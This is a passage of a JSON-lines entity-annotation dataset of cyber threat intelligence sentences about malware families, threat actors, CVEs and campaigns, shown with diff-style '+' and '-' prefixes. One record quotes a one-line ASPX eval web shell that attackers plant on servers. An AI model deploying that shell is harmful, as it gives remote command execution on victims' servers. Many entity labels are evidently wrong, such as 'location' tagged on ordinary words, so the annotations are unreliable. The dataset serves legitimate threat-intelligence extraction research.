Security is a no-maintenance cloud solution that delivers continuously updated protection to stop spam, malware, spear phishing, ransomware, and advanced targeted attacks before they reach the network.","entities":[{"id":24223,"label":"location","start_offset":6,"end_offset":11},{"id":24224,"label":"location","start_offset":26,"end_offset":34},{"id":24225,"label":"location","start_offset":55,"end_offset":60},{"id":24226,"label":"location","start_offset":105,"end_offset":115},{"id":24227,"label":"location","start_offset":119,"end_offset":123},{"id":24228,"label":"attack-pattern","start_offset":139,"end_offset":153},{"id":24229,"label":"location","start_offset":167,"end_offset":170}],"relations":[],"Comments":[]} +{"id":1749,"text":"Email us at u42comms@paloaltonetworks.com.","entities":[{"id":45116,"label":"EMAIL","start_offset":12,"end_offset":41}],"relations":[],"Comments":[]} +{"id":12953,"text":" We did not capture the subsequent stages, but assess the attackers did not have exploits for the current version of Chrome (91.0.4472) at that time, but instead used n-day exploits targeting Samsung Browser, which was running an older and vulnerable version of Chromium.","entities":[{"id":40336,"label":"location","start_offset":144,"end_offset":148},{"id":40338,"label":"location","start_offset":236,"end_offset":239},{"id":40339,"label":"threat-actor","start_offset":262,"end_offset":270}],"relations":[],"Comments":[]} +{"id":753,"text":" Figure 1. _g_hIsolatedHeap handle used for isolated heap ","entities":[],"relations":[],"Comments":[]} +{"id":974,"text":"SMS uploaded via HTTP in pcap The Taomike library makes contact with the following URLs, but only the \u201c2c.php\u201d path is used to capture SMS messages.","entities":[{"id":3051,"label":"attack-pattern","start_offset":128,"end_offset":148},{"id":46472,"label":"FILEPATH","start_offset":104,"end_offset":110},{"id":46471,"label":"identity","start_offset":35,"end_offset":42}],"relations":[],"Comments":[]} +{"id":3601,"text":" Figure 9.","entities":[],"relations":[],"Comments":[]} +{"id":2757,"text":"At first glance, this might not seem too dangerous as executing commands is Bash\u2019s primary function, but it\u2019s important to understand that many other programs use Bash to process commands.","entities":[{"id":45687,"label":"SOFTWARE","start_offset":76,"end_offset":80},{"id":45688,"label":"SOFTWARE","start_offset":163,"end_offset":167}],"relations":[],"Comments":[]} +{"id":11482,"text":"This is the first known instance of Turla distributing Android-related malware.","entities":[],"relations":[],"Comments":[]} +{"id":3506,"text":"If so, the attack moves to the second stage by deploying Protux.","entities":[{"id":49300,"label":"malware","start_offset":57,"end_offset":63}],"relations":[],"Comments":[]} +{"id":3835,"text":"The format ANEL uses to send data is similar to ChChes, but ANEL's encryption method is easier to use.","entities":[{"id":11630,"label":"malware","start_offset":11,"end_offset":15},{"id":11631,"label":"malware","start_offset":48,"end_offset":54},{"id":11632,"label":"malware","start_offset":60,"end_offset":64}],"relations":[],"Comments":[]} +{"id":5905,"text":"Well, everybody, thanks for joining us again.","entities":[],"relations":[],"Comments":[]} +{"id":838,"text":"And understanding is a first step to prevention.","entities":[],"relations":[],"Comments":[]} +{"id":3912,"text":"One notable vulnerability in the Microsoft Exchange Server is CVE-2020-0688, a remote code execution bug.","entities":[{"id":49764,"label":"SOFTWARE","start_offset":33,"end_offset":58},{"id":49765,"label":"vulnerability","start_offset":62,"end_offset":75},{"id":49766,"label":"attack-pattern","start_offset":79,"end_offset":100}],"relations":[{"id":866,"from_id":49764,"to_id":49765,"type":"has"},{"id":867,"from_id":49765,"to_id":49766,"type":"uses"}],"Comments":[]} +{"id":8253,"text":"This highlights how the cybercrime underground in the Middle East\/North African region (covered in our paper titled Digital Souks: A Glimpse into the Middle Eastern and North African Underground) can expand their activity into areas beyond their original area of expertise.","entities":[{"id":25484,"label":"location","start_offset":80,"end_offset":86},{"id":25486,"label":"location","start_offset":196,"end_offset":199},{"id":25487,"label":"malware","start_offset":200,"end_offset":206}],"relations":[],"Comments":[]} +{"id":11354,"text":"GeckoHtmlElement > (","entities":[],"relations":[],"Comments":[]} +{"id":4075,"text":"HTShell hardcoded C&Cs HTShell encodes a hard\u00ad-coded string, \"tp===\" with custom base64 and embeds the encoded string in the request cookies.","entities":[{"id":49911,"label":"malware","start_offset":0,"end_offset":7},{"id":49912,"label":"malware","start_offset":27,"end_offset":34}],"relations":[],"Comments":[]} +{"id":925,"text":"I originally wished to determine if the new version of PClock, PClock 2, included enough improvements to compete with some of the larger ransomware malware families, such as CryptoWall, TeslaCrypt, or TorrentLocker.","entities":[{"id":2911,"label":"malware","start_offset":174,"end_offset":184},{"id":2913,"label":"malware","start_offset":201,"end_offset":214},{"id":46442,"label":"malware","start_offset":186,"end_offset":196},{"id":46446,"label":"malware","start_offset":63,"end_offset":71},{"id":46447,"label":"malware","start_offset":55,"end_offset":61}],"relations":[],"Comments":[]} +{"id":660,"text":" As always if you have any questions, please come to the Threat & Vulnerability Discussions on our Live Community. Version Summary June 27, 2017: June 27, 2017 \u2013 1:08 PM PT June 28, 2017 \u2013 8:40 AM PT June 29, 2017 - 5:00 PM PT Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[{"id":46238,"label":"TIME","start_offset":133,"end_offset":146},{"id":46241,"label":"TIME","start_offset":177,"end_offset":203},{"id":46242,"label":"TIME","start_offset":205,"end_offset":231},{"id":46240,"label":"TIME","start_offset":149,"end_offset":175}],"relations":[],"Comments":[]} +{"id":2495,"text":" Palo Alto Networks Next-Generation Firewall with a Threat Prevention subscription can block the attack traffic related to this vulnerability. Palo Alto Networks Prisma Cloud can detect the presence of both CVE-2022-22965 and CVE-2022-22963 across all Compute environments.","entities":[{"id":47583,"label":"vulnerability","start_offset":208,"end_offset":222},{"id":47582,"label":"SOFTWARE","start_offset":144,"end_offset":175},{"id":47581,"label":"SOFTWARE","start_offset":2,"end_offset":69},{"id":47584,"label":"vulnerability","start_offset":227,"end_offset":241}],"relations":[],"Comments":[]} +{"id":2192,"text":" The difference between the files involves the specific video player that was dropped and executed during runtime.","entities":[],"relations":[],"Comments":[]} +{"id":1890,"text":"We mentioned Urpage as a third unnamed threat actor connected to the two.","entities":[{"id":45164,"label":"threat-actor","start_offset":13,"end_offset":19}],"relations":[],"Comments":[]} +{"id":5196,"text":"A summary of our findings across the main DDS implementations and standard specification.","entities":[],"relations":[],"Comments":[]} +{"id":3902,"text":"Enterprises, especially critical infrastructure establishments, must report the attack to law enforcement to help bring the attackers to justice.","entities":[],"relations":[],"Comments":[]} +{"id":521,"text":"The process of delivering malware by a URL can include various techniques.","entities":[],"relations":[],"Comments":[]} +{"id":1320,"text":"FormerFirstRAT communicates using unencrypted HTTP over port 443; the use of mismatching ports and communication protocols is not uncommon in targeted attack campaigns.","entities":[{"id":3993,"label":"malware","start_offset":0,"end_offset":14},{"id":46669,"label":"campaign","start_offset":142,"end_offset":167}],"relations":[{"id":210,"from_id":46669,"to_id":3993,"type":"uses"}],"Comments":[]} +{"id":1007,"text":"For example, the standard annual fee for Amazon Prime is $99 USD; however, with the student discount, a buyer could enjoy it for free the first six months and then renew at half price for subsequent years.","entities":[{"id":46509,"label":"identity","start_offset":41,"end_offset":53}],"relations":[],"Comments":[]} +{"id":1703,"text":"These kinds of takedowns are the impetus for some of the most impressive developments in malware technology over the last decade.","entities":[],"relations":[],"Comments":[]} +{"id":9210,"text":"Twenty days later, HSE continues to face IT system difficulties, causing delays in some of its services.","entities":[],"relations":[],"Comments":[]} +{"id":1438,"text":"You can use keytool or openssl tools to view the certificate information.","entities":[],"relations":[],"Comments":[]} +{"id":5413,"text":"The Asus version of the Cyclops Blink malware that we have analyzed showed some differences compared to the WatchGuard versions that have been previously discussed.","entities":[{"id":51417,"label":"malware","start_offset":24,"end_offset":37},{"id":51418,"label":"identity","start_offset":108,"end_offset":118},{"id":51419,"label":"identity","start_offset":4,"end_offset":9}],"relations":[],"Comments":[]} +{"id":4733,"text":"In contrast to commercial surveillance vendors, who we generally observe selling a capability for the end user to operate, hack-for-hire firms conduct attacks themselves.","entities":[{"id":50642,"label":"attack-pattern","start_offset":123,"end_offset":136}],"relations":[],"Comments":[]} +{"id":4556,"text":"However, the 'DoS' consists only of a single GET request to the target website, not enough to be effective.","entities":[{"id":50366,"label":"attack-pattern","start_offset":14,"end_offset":17}],"relations":[],"Comments":[]} +{"id":3486,"text":"Protux\u2019s encrypted configuration on a public blog (note the six magnet URLs; the third is Protux\u2019s latest configuration format)","entities":[{"id":10584,"label":"malware","start_offset":0,"end_offset":6},{"id":10589,"label":"malware","start_offset":90,"end_offset":96}],"relations":[],"Comments":[]} +{"id":4244,"text":"We found more code shared among the two threat actor\u2019s malware, as Patchwork recently used multiple Delphi malware similar to some of the Delphi malware we described before.","entities":[{"id":50049,"label":"malware","start_offset":138,"end_offset":152},{"id":50050,"label":"malware","start_offset":100,"end_offset":114},{"id":50048,"label":"threat-actor","start_offset":67,"end_offset":76}],"relations":[{"id":904,"from_id":50048,"to_id":50050,"type":"uses"},{"id":905,"from_id":50049,"to_id":50050,"type":"duplicate-of"}],"Comments":[]} +{"id":1739,"text":"Especially when you get an email from someone that looks like someone you trust.","entities":[],"relations":[],"Comments":[]} +{"id":12988,"text":"The data is then exfiltrated via email to a compromised email account.","entities":[],"relations":[],"Comments":[]} +{"id":1483,"text":"They serve an important role for the majority of businesses that do not have in-house developers.","entities":[],"relations":[],"Comments":[]} +{"id":2759,"text":"The only way to fully prevent exploitation is to upgrade Bash on the system to a non-vulnerable version. Impact","entities":[],"relations":[],"Comments":[]} +{"id":2754,"text":"bash -c \"echo this is a test\"","entities":[],"relations":[],"Comments":[]} +{"id":12906,"text":"Data was processed that shows an event occurred related to the process being detected.","entities":[],"relations":[],"Comments":[]} +{"id":1080,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address! Please mark, I'm not a robot! ","entities":[],"relations":[],"Comments":[]} +{"id":2110,"text":"Sign up to receive the latest news, cyber threat intelligence and research from us","entities":[],"relations":[],"Comments":[]} +{"id":791,"text":"It can also make the exploitations of heap overflows or type confusion bugs significantly more difficult.","entities":[{"id":46353,"label":"attack-pattern","start_offset":21,"end_offset":52}],"relations":[],"Comments":[]} +{"id":13649,"text":"The use of cloud services allowed them to obfuscate their operations by hosting infrastructures in the services themselves, making their activities tougher to spot for forensics.","entities":[{"id":51737,"label":"Infrastucture","start_offset":11,"end_offset":25}],"relations":[],"Comments":[]} +{"id":1100,"text":" Since each shared resource can only have a single mutex effectively protecting it, leveraging that mutex is indication that a program will be using said resource.","entities":[],"relations":[],"Comments":[]} +{"id":10784,"text":"The first thing we did was check the URL where the malicious APK file was hosted (https:\/\/egov[.]sy\/mobile\/egov[.]apk).","entities":[{"id":32973,"label":"location","start_offset":27,"end_offset":32},{"id":32974,"label":"URL","start_offset":82,"end_offset":99},{"id":32975,"label":"location","start_offset":100,"end_offset":106}],"relations":[],"Comments":[]} +{"id":3923,"text":"<%@ Page Language=\"Jscript\"%><%eval(Request.Form[\"Command\"],\"unsafe\");%> We\u2019ve observed that in some cases, malicious actors insert this short script to avoid detection: Figure 1. A short script","entities":[],"relations":[],"Comments":[]} +{"id":3775,"text":" WildFire and Cortex XDR categorize all samples of supported file types as malware.","entities":[{"id":49609,"label":"SOFTWARE","start_offset":1,"end_offset":9},{"id":49610,"label":"SOFTWARE","start_offset":14,"end_offset":24}],"relations":[],"Comments":[]} +{"id":4697,"text":"This bulletin includes coordinated influence operation campaigns terminated on our platforms in Q2 2022.","entities":[{"id":50581,"label":"TIME","start_offset":96,"end_offset":103}],"relations":[],"Comments":[]} +{"id":7301,"text":"Decryption routine Like older versions of the OceanLotus backdoor, the new version contains two main functions: one for collecting operating system information and submitting this to its malicious C&C servers and receiving additional C&C communication information, and another for the backdoor capabilities.","entities":[{"id":22758,"label":"malware","start_offset":50,"end_offset":60},{"id":22760,"label":"location","start_offset":116,"end_offset":119},{"id":22761,"label":"location","start_offset":164,"end_offset":167},{"id":22762,"label":"location","start_offset":213,"end_offset":216},{"id":22763,"label":"location","start_offset":269,"end_offset":272}],"relations":[],"Comments":[]} +{"id":12494,"text":"We have also taken extraordinary measures beyond our actions against coordinated influence operations to protect users and stop the spread of misinformation and disinformation about the war in Ukraine online.","entities":[{"id":38873,"label":"location","start_offset":119,"end_offset":122},{"id":38874,"label":"malware","start_offset":123,"end_offset":127},{"id":38875,"label":"location","start_offset":157,"end_offset":160},{"id":38876,"label":"location","start_offset":186,"end_offset":189}],"relations":[],"Comments":[]} +{"id":2518,"text":" If you think you may have been impacted, please email unit42-investigations@paloaltonetworks.com or call (866) 4-UNIT42 to get in touch with the Unit 42 Incident Response team.","entities":[{"id":7555,"label":"EMAIL","start_offset":55,"end_offset":97},{"id":47714,"label":"identity","start_offset":146,"end_offset":176}],"relations":[],"Comments":[]} +{"id":1001,"text":"For example, the most popular account type, which has been bought at least 569 times, was advertised as a Microsoft\u2019s student Windows Phone 7 and 8 developer account.","entities":[{"id":46504,"label":"identity","start_offset":106,"end_offset":116}],"relations":[],"Comments":[]} +{"id":10829,"text":"MSG_HEARTBEAT","entities":[],"relations":[],"Comments":[]} +{"id":2182,"text":" Please mark, I'm not a robot!","entities":[],"relations":[],"Comments":[]} +{"id":1189,"text":"In the Android ecosystem, in addition to the official IAP service by Google, there are many third-party IAP Software Development Kits (SDKs) spread around the world.","entities":[{"id":46584,"label":"identity","start_offset":69,"end_offset":75},{"id":46583,"label":"SOFTWARE","start_offset":7,"end_offset":14}],"relations":[],"Comments":[]} +{"id":10478,"text":"Related IOCs","entities":[],"relations":[],"Comments":[]} +{"id":646,"text":"The software is heavily used in Ukraine it appears the company\u2019s systems may have been compromised and used to issue a malicious update to systems running the program on the morning of Jun 27th.","entities":[{"id":46230,"label":"TIME","start_offset":174,"end_offset":193},{"id":46231,"label":"location","start_offset":32,"end_offset":39}],"relations":[],"Comments":[]} +{"id":7412,"text":"Trend Micro solutions","entities":[],"relations":[],"Comments":[]} +{"id":8062,"text":"Android App: https:\/\/www.virustotal.com\/gui\/file\/5d3ff202f20af915863eee45916412a271bae1ea3a0e20988309c16723ce4da5\/detection Android App C2: communication-shield[.]site cdsa[.]xyz","entities":[],"relations":[],"Comments":[]} +{"id":6160,"text":"Propagation","entities":[],"relations":[],"Comments":[]} +{"id":946,"text":"Antivirus programs typically identify these apps as malware, the topic of this blog is something different and harder to detect.","entities":[],"relations":[],"Comments":[]} +{"id":3018,"text":"If you haven\u2019t been using it, consider using that feature.","entities":[],"relations":[],"Comments":[]} +{"id":9953,"text":"Indicators of Compromise","entities":[],"relations":[],"Comments":[]} +{"id":6556,"text":"Our initial investigation on the domains registered by Hack520 revealed that similar domains (listed below) were registered by another profile.","entities":[],"relations":[],"Comments":[]} +{"id":7112,"text":"HyperBro Malware Family","entities":[{"id":22264,"label":"malware","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} +{"id":2995,"text":" 6. Be Smart with Your Smart Home: Smart home is an umbrella term for a diverse set of devices that have one thing in common: they all feature some kind of internet connectivity.","entities":[],"relations":[],"Comments":[]} +{"id":7025,"text":"The old and new SysUpdate infection chains In December 2020, we found a sample that we identified as one belonging to the SysUpdate malware family, also named Soldier, FOCUSFJORD, and HyperSSL.","entities":[{"id":22026,"label":"location","start_offset":8,"end_offset":11},{"id":22027,"label":"malware","start_offset":16,"end_offset":25},{"id":22029,"label":"location","start_offset":77,"end_offset":83},{"id":22030,"label":"location","start_offset":106,"end_offset":109},{"id":22031,"label":"malware","start_offset":127,"end_offset":136},{"id":22033,"label":"malware","start_offset":173,"end_offset":183},{"id":22034,"label":"location","start_offset":185,"end_offset":188},{"id":22035,"label":"malware","start_offset":189,"end_offset":197}],"relations":[],"Comments":[]} +{"id":9553,"text":"The attacker runs HYPERSCRAPE on their own machine to download victims\u2019 inboxes using previously acquired credentials.","entities":[],"relations":[],"Comments":[]} +{"id":1670,"text":" With the two keys in place, the malware uses the AES algorithm to encrypt traffic using Output Feedback (OFB) mode (Picture courtesy of Wikipedia). The output of the block cipher encryption is eXclusive OR\u2019ed (XOR\u2019d) with 16 bytes of ciphertext to decrypt. Each subsequent block of ciphertext will use the previous encrypted data as the IV passed into the block cipher encryption function.","entities":[],"relations":[],"Comments":[]} +{"id":7190,"text":"IssueMakersLab also listed the ActiveX objects that the Andariel group attacked.","entities":[],"relations":[],"Comments":[]} +{"id":5128,"text":"[02:22] If an attacker breaches into your systems, whether they come in like a fourth of all attacks do via email whether they come in directly through a server compromise, which is about half of all breaches according to the Verizon data breach investigation report or one of the other methods that is commonly used\u2026then they start to move around within your network.","entities":[],"relations":[],"Comments":[]} +{"id":3505,"text":"This allows threat actors to monitor and check whether the affected system is of interest to them.","entities":[],"relations":[],"Comments":[]} +{"id":7879,"text":" This includes (as discussed earlier) the default Android Mail and Browser applications, but also other e-mail, SSH and FTP applications, many of which store login and password details without any additional encryption.","entities":[{"id":24386,"label":"location","start_offset":63,"end_offset":66},{"id":24387,"label":"location","start_offset":116,"end_offset":119},{"id":24388,"label":"malware","start_offset":120,"end_offset":123},{"id":24389,"label":"location","start_offset":138,"end_offset":142},{"id":24390,"label":"location","start_offset":164,"end_offset":167}],"relations":[],"Comments":[]} +{"id":3517,"text":"Based on this behavior, we can map out a pattern, from the downloader to the decoy documents used.","entities":[],"relations":[],"Comments":[]} +{"id":3633,"text":"Sometimes, when that target is a high-value target this attack can also be referred to as \u2018Whaling\u201d. In our new research, our Unit 42 research team has found an attack that takes the refining of spear phishing one step further.","entities":[{"id":49418,"label":"identity","start_offset":127,"end_offset":148},{"id":49416,"label":"attack-pattern","start_offset":196,"end_offset":210}],"relations":[],"Comments":[]} +{"id":371,"text":"The details were reported to Atlassian on May 31, and Atlassian has since assigned the issue to CVE-2022-26134.","entities":[{"id":46064,"label":"TIME","start_offset":42,"end_offset":48},{"id":46065,"label":"identity","start_offset":29,"end_offset":38},{"id":46066,"label":"identity","start_offset":54,"end_offset":63},{"id":46067,"label":"vulnerability","start_offset":96,"end_offset":110}],"relations":[],"Comments":[]} +{"id":12342,"text":"The Iranian attacker group (APT35) and the Chinese attacker group (APT31) targeted campaign staffers\u2019 personal emails with credential phishing emails and emails containing tracking links.","entities":[{"id":38327,"label":"location","start_offset":35,"end_offset":38},{"id":38330,"label":"location","start_offset":83,"end_offset":91},{"id":38331,"label":"attack-pattern","start_offset":134,"end_offset":142},{"id":38332,"label":"location","start_offset":150,"end_offset":153}],"relations":[],"Comments":[]} +{"id":11104,"text":"In one example, attackers impersonated McAfee.","entities":[],"relations":[],"Comments":[]} +{"id":9454,"text":"It is interesting to note that there is a typographical error in \u201c-InokeMethodParam.\u201d ","entities":[],"relations":[],"Comments":[]} +{"id":996,"text":"The most expensive account was listed at \u00a52400 RMB ($390.80 USD), while the cheapest was only \u00a50.98 RMB ($0.16 USD). Figure 1: Results for Chinese language \"edu mailbox\" search on Taobao.","entities":[{"id":46492,"label":"SOFTWARE","start_offset":181,"end_offset":187}],"relations":[],"Comments":[]} +{"id":7754,"text":"The downloaded file is a text file with a single number on each line.","entities":[],"relations":[],"Comments":[]} +{"id":2832,"text":" On Friday, May 12, 2017, Microsoft announced that they were making an emergency patch available for out-of-support versions of Windows (Windows XP, Windows 8 and Windows Server 2003). ","entities":[{"id":45717,"label":"SOFTWARE","start_offset":128,"end_offset":135},{"id":45714,"label":"TIME","start_offset":4,"end_offset":24},{"id":45716,"label":"identity","start_offset":26,"end_offset":35},{"id":45718,"label":"SOFTWARE","start_offset":137,"end_offset":147},{"id":45719,"label":"SOFTWARE","start_offset":149,"end_offset":158},{"id":45720,"label":"SOFTWARE","start_offset":163,"end_offset":182}],"relations":[],"Comments":[]} +{"id":11547,"text":"After compromising an account, the actor maintains persistence by granting themselves an OAuth token to a legitimate email app like Thunderbird, or by linking the victim Gmail account to an attacker-owned account on a third-party mail provider.","entities":[],"relations":[],"Comments":[]} +{"id":3678,"text":"Carbanak also abuses command-line interface and DDE client-server protocol.","entities":[{"id":49472,"label":"threat-actor","start_offset":0,"end_offset":8}],"relations":[],"Comments":[]} +{"id":7660,"text":"While it's easy to attribute similar incidents to certain threat actors, groups, or even countries, attribution should ultimately be based on technically provable information.","entities":[],"relations":[],"Comments":[]} +{"id":9715,"text":"STRINGDATA::BROWSER_SESSION_ID","entities":[],"relations":[],"Comments":[]} +{"id":12005,"text":"Since late 2019, our team has disrupted financially motivated phishing campaigns targeting YouTubers with Cookie Theft malware.","entities":[{"id":37127,"label":"attack-pattern","start_offset":62,"end_offset":70}],"relations":[],"Comments":[]} +{"id":14392,"text":"Pulling together the tenuous and ephemeral threads of such an intentional attack needs more modern tools, rather than hoping we stumble on a supply of highly advanced threat hunters.","entities":[],"relations":[],"Comments":[]} {"id":53,"text":"While US$300 payments are less than a single account takeover could return, ransomware makes greater returns due to the volume and decreased risk in this new business model.","entities":[],"relations":[],"Comments":[]} -{"id":54,"text":"Cybercriminals have become good business people: they saw the benefits and embraced the change.","entities":[],"relations":[],"Comments":[]} -{"id":55,"text":"Enter “The Bubble” – Where We Are Now","entities":[],"relations":[],"Comments":[]} -{"id":56,"text":"In the last two years, but particularly in the last six months, the price of bitcoin and other cryptocurrencies experienced a massive price surge with respect to the U.S. dollar and other fiat currencies.","entities":[],"relations":[],"Comments":[]} -{"id":57,"text":"Here’s the chart for bitcoin over the last two years, showing a rise of 2,000% to 4,000% in the versus the U.S. dollar.","entities":[{"id":44585,"label":"SOFTWARE","start_offset":21,"end_offset":28}],"relations":[],"Comments":[]} -{"id":58,"text":"Figure 2: Price of bitcoin in U.S. dollars from CoinMarketCap While botnets mining cryptocurrency is nothing new, the technique was much less profitable than using ransomware.","entities":[{"id":45817,"label":"SOFTWARE","start_offset":19,"end_offset":26},{"id":45818,"label":"SOFTWARE","start_offset":48,"end_offset":60}],"relations":[],"Comments":[]} -{"id":59,"text":"In fact, with the rise of specialized bitcoin mining hardware, no regular PC can make any significant amount of money for an attacker.","entities":[],"relations":[],"Comments":[]} -{"id":60,"text":"However, there are many other “crypto coins” in the market today.","entities":[],"relations":[],"Comments":[]} -{"id":61,"text":"The one we see mined most by attackers is called Monero.","entities":[{"id":45819,"label":"SOFTWARE","start_offset":49,"end_offset":55}],"relations":[],"Comments":[]} -{"id":62,"text":"In contrast to bitcoin, Monero was designed to enable private transactions using a closed ledger, and its mining algorithm is still mined effectively by both PC CPUs and GPUs.","entities":[{"id":45820,"label":"SOFTWARE","start_offset":24,"end_offset":30}],"relations":[],"Comments":[]} -{"id":63,"text":"As the chart below shows, Monero has risen even faster than bitcoin in price in the last two years, with more than a 30,000% gain in U.S. dollars.","entities":[{"id":45773,"label":"TIME","start_offset":84,"end_offset":98},{"id":44583,"label":"SOFTWARE","start_offset":26,"end_offset":32},{"id":44584,"label":"SOFTWARE","start_offset":60,"end_offset":67}],"relations":[],"Comments":[]} -{"id":64,"text":"Figure 3: Price of Monero in U.S. dollars from CoinMarketCap ","entities":[{"id":45821,"label":"SOFTWARE","start_offset":19,"end_offset":25},{"id":45823,"label":"SOFTWARE","start_offset":47,"end_offset":60}],"relations":[],"Comments":[]} -{"id":65,"text":"A normal PC used to mine Monero can earn around US$0.25 per day at the current prices.","entities":[{"id":45824,"label":"SOFTWARE","start_offset":25,"end_offset":31}],"relations":[],"Comments":[]} -{"id":66,"text":"That number is small, but it’s important to note that it doesn’t matter what country or network a Monero miner is part of: computers in Australia and Poland mine at the same speed.","entities":[{"id":44586,"label":"SOFTWARE","start_offset":98,"end_offset":104},{"id":44587,"label":"location","start_offset":136,"end_offset":145},{"id":44588,"label":"location","start_offset":150,"end_offset":156}],"relations":[],"Comments":[]} -{"id":67,"text":"Every infected system is a profit-generating resource when mining Monero, and users are much less likely to identify their infection and remove the mining program than they would be with ransomware.","entities":[{"id":45825,"label":"SOFTWARE","start_offset":66,"end_offset":72}],"relations":[],"Comments":[]} -{"id":68,"text":"For context, in January, we found a Monero mining campaign that infected around 15 million systems, largely in the developing world.","entities":[{"id":45827,"label":"SOFTWARE","start_offset":36,"end_offset":42},{"id":45826,"label":"TIME","start_offset":16,"end_offset":23},{"id":45828,"label":"location","start_offset":115,"end_offset":131}],"relations":[],"Comments":[]} -{"id":69,"text":"If these systems remained infected for at least 24 hours each, the attackers could have earned well over 3 million U.S. dollars in Monero.","entities":[{"id":260,"label":"TIME","start_offset":39,"end_offset":56},{"id":44589,"label":"SOFTWARE","start_offset":131,"end_offset":137}],"relations":[],"Comments":[]} -{"id":70,"text":"Additionally, the risk of arrest and conviction is significantly lower than with ransomware, as mining cryptocurrency is less likely to generate reports to law enforcement than a data-destroying ransomware infection.","entities":[],"relations":[],"Comments":[]} -{"id":71,"text":" What’s Next?","entities":[],"relations":[],"Comments":[]} -{"id":72,"text":"This wave of attacks will continue as long as it maintains a high level of profitability with a low level of risk for cybercriminals.","entities":[],"relations":[],"Comments":[]} -{"id":73,"text":"For defenders, it’s important to note that the techniques used to infect systems with coin mining malware are the same as they were for ransomware.","entities":[],"relations":[],"Comments":[]} -{"id":74,"text":"Infections typically begin with emails carrying malicious macro documents, drive-by exploit kits targeting browsers, or direct attacks on servers running vulnerable software.","entities":[],"relations":[],"Comments":[]} -{"id":75,"text":"There is no single solution to stopping these attacks, but the same technologies and policies you use to prevent other malware infections will be effective.","entities":[{"id":44590,"label":"attack-pattern","start_offset":119,"end_offset":137}],"relations":[],"Comments":[]} -{"id":76,"text":"Across the changing landscape of botnet herders, Banking Trojans, ransomware and coin mining is one constant: the business-savvy drive to maximize profit and reduce risk.","entities":[],"relations":[],"Comments":[]} -{"id":77,"text":"Using these as our guide, we can make sense of where we are today, how we got here, and be prepared for what has yet to develop in the future.","entities":[],"relations":[],"Comments":[]} -{"id":78,"text":"Here are three things to watch for:","entities":[],"relations":[],"Comments":[]} -{"id":79,"text":"1. A marked increase in the price of Monero or other cryptocurrencies will draw even more attackers into this business.","entities":[{"id":45829,"label":"SOFTWARE","start_offset":37,"end_offset":43}],"relations":[],"Comments":[]} -{"id":80,"text":"For many users, this could actually be a positive development, as the negative impact of having resources sapped from one’s computer is much less than paying a ransom or restoring your system from a backup due to ransomware.","entities":[],"relations":[],"Comments":[]} -{"id":81,"text":"Conversely, a crash in the price of cryptocurrencies will decrease the profitability and drive criminals back to ransomware.","entities":[],"relations":[],"Comments":[]} -{"id":82,"text":"2. Listen to your fans or keep an eye on your CPU usage.","entities":[],"relations":[],"Comments":[]} -{"id":83,"text":"Many users realize their system is infected with coin mining malware when their laptop fans kick into high-speed mode to keep the overtaxed CPU cool.","entities":[],"relations":[],"Comments":[]} -{"id":84,"text":"Listening to fans won’t work at the enterprise scale, but implementing widespread CPU performance monitoring could be a good way to find compromised devices.","entities":[],"relations":[],"Comments":[]} -{"id":85,"text":"This will also help you identify the coin mining “insider threat,” as misguided administrators may see their organizations’ unused CPU time as a way to generate personal income.","entities":[],"relations":[],"Comments":[]} -{"id":86,"text":"3. Criminals will find ways to target these attacks.","entities":[],"relations":[],"Comments":[]} -{"id":87,"text":"Compromising a user’s browser or a regular home PC will net the criminal an average system for mining coins, but higher-end systems will generate more income.","entities":[{"id":45830,"label":"attack-pattern","start_offset":0,"end_offset":29}],"relations":[],"Comments":[]} -{"id":88,"text":"Attackers will soon begin targeting devices with higher specifications to get more bang for their buck.","entities":[],"relations":[],"Comments":[]} -{"id":89,"text":"Gaming PCs with high-end GPUs and servers with large numbers of processing cores will be prime targets.","entities":[],"relations":[],"Comments":[]} -{"id":90,"text":" Sign up to receive the latest news, cyber threat intelligence and research from us Please enter your email address!","entities":[],"relations":[],"Comments":[]} -{"id":91,"text":" Please mark, I'm not a robot! By submitting this form, you agree to our Terms of Use and acknowledge our Privacy Statement.","entities":[],"relations":[],"Comments":[]} -{"id":92,"text":"It’s that time of year again – our researchers have analyzed and reviewed the threats and attacks that occurred during the first half of 2021.","entities":[{"id":45831,"label":"TIME","start_offset":123,"end_offset":141}],"relations":[],"Comments":[]} -{"id":93,"text":"Our report, Attacks From All Angles: 2021 Midyear Security Roundup, highlights many of the active attacks we saw, from APTs to ransomware to zero-day exploits.","entities":[{"id":44591,"label":"TIME","start_offset":37,"end_offset":49},{"id":44592,"label":"attack-pattern","start_offset":141,"end_offset":158}],"relations":[],"Comments":[]} -{"id":94,"text":"I’d like to highlight an area where we are seeing increased activity: attacks against cloud infrastructures.","entities":[],"relations":[],"Comments":[]} -{"id":95,"text":"I’ve spoken on this at a few events and asked my audiences how many have active cloud infrastructure projects going on, the answer is always most of them.","entities":[],"relations":[],"Comments":[]} -{"id":96,"text":"In our 1H’ 2021 Cyber Risk Index, we asked organizations what their top infrastructure risks are.","entities":[{"id":45832,"label":"identity","start_offset":16,"end_offset":32},{"id":44593,"label":"TIME","start_offset":7,"end_offset":15}],"relations":[],"Comments":[]} -{"id":97,"text":"Cloud security has been in the top two for the last few years.","entities":[],"relations":[],"Comments":[]} -{"id":98,"text":"Obviously, many organizations are moving quickly to the cloud and, as such, need to be thinking about how to secure it.","entities":[],"relations":[],"Comments":[]} -{"id":99,"text":"Below is an overview of what we’re seeing in cloud attacks.","entities":[],"relations":[],"Comments":[]} -{"id":100,"text":" Threats Impacting Cloud Environments","entities":[],"relations":[],"Comments":[]} -{"id":101,"text":"In our first half report, we highlight an APT group named TeamTNT that has been targeting clouds for quite a while now.","entities":[{"id":45833,"label":"threat-actor","start_offset":58,"end_offset":65}],"relations":[],"Comments":[]} -{"id":102,"text":"They have focused most of their efforts on planting crypto-mining malware on cloud servers in an effort to mine Monero coins, but we have also seen them utilize DDoS IRC bots, steal cloud account credentials, and exfil data.","entities":[{"id":44594,"label":"SOFTWARE","start_offset":112,"end_offset":118},{"id":44595,"label":"attack-pattern","start_offset":161,"end_offset":165},{"id":44596,"label":"attack-pattern","start_offset":176,"end_offset":207},{"id":44597,"label":"attack-pattern","start_offset":213,"end_offset":223},{"id":44598,"label":"malware","start_offset":52,"end_offset":73}],"relations":[],"Comments":[]} -{"id":103,"text":"As you can see from the above diagram, all of these are end goals for most attacks.","entities":[],"relations":[],"Comments":[]} -{"id":104,"text":"Speaking of data 